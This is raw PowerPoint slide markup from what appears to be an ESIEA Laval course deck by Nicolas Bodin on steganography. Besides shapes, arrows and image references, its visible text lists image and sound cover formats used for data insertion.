            <a:ext cx="1356500" cy="942503"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="684529" h="475614">
                <a:moveTo>
                  <a:pt x="684289" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="684289" y="475318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="475318"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4737">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="object 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6639461" y="5319915"/>
            <a:ext cx="153519" cy="101926"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="77470" h="51435">
                <a:moveTo>
                  <a:pt x="77377" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="25266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77377" y="51058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77377" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="object 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2648579" y="2867596"/>
            <a:ext cx="0" cy="581357"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="293369">
                <a:moveTo>
                  <a:pt x="0" y="293191"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4737">
            <a:solidFill>
              <a:srgbClr val="007F00"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="object 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2597468" y="2745554"/>
            <a:ext cx="103183" cy="153519"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="52069" h="77469">
                <a:moveTo>
                  <a:pt x="25792" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="76851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51584" y="76851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25792" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="007F00"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="object 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726155" y="1822415"/>
            <a:ext cx="591434" cy="591434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="object 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7675256" y="3595677"/>
            <a:ext cx="886630" cy="588305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="object 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681302" y="5074786"/>
            <a:ext cx="636286" cy="591434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="object 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4274764" y="5074786"/>
            <a:ext cx="886630" cy="591434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="object 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1909023" y="3641573"/>
            <a:ext cx="1362282" cy="398461"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="object 75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165070" y="12638854"/>
            <a:ext cx="5798470" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t>ESIEA </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Laval </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Nicolas</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="99" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t>Bodin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="object 76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8033591" y="6621582"/>
            <a:ext cx="557448" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1189" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>11 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>49</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Rectangle 76"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1861112091"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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4747" y="88033"/>
            <a:ext cx="1215565" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-149" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Steganography</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165070" y="12638854"/>
            <a:ext cx="5798470" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t>ESIEA </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Laval </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Nicolas</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="99" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t>Bodin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13054948" y="12638854"/>
            <a:ext cx="4167651" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="50335">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>14 </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>49</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7420120" y="88033"/>
            <a:ext cx="1165231" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>B. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Insertion</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549738" y="682125"/>
            <a:ext cx="4760333" cy="426912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2774" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Cover </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>modification </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-208" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="446" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>types</a:t>
            </a:r>
            <a:endParaRPr sz="2774">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360834" y="1543217"/>
            <a:ext cx="8418352" cy="799825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E536D"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="49076" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="213925">
              <a:spcBef>
                <a:spcPts val="386"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="8203376" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-188" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Image	</a:t>
            </a:r>
            <a:endParaRPr sz="2378">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="213925">
              <a:spcBef>
                <a:spcPts val="503"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-159" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Uncompressed  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(BMP, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>RAW,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PNG,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>GIF) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-178" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Compressed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-208" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(JPEG)</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360834" y="2772851"/>
            <a:ext cx="8418352" cy="799825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E536D"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="49076" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="213925">
              <a:spcBef>
                <a:spcPts val="386"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="8203376" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Sound	</a:t>
            </a:r>
            <a:endParaRPr sz="2378">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="213925">
              <a:spcBef>
                <a:spcPts val="503"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-159" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Uncompressed  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-79" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(WAV, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PCM) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-168" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>compressed  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(MP3, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WMA,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="297" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ogg)</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360834" y="4002484"/>
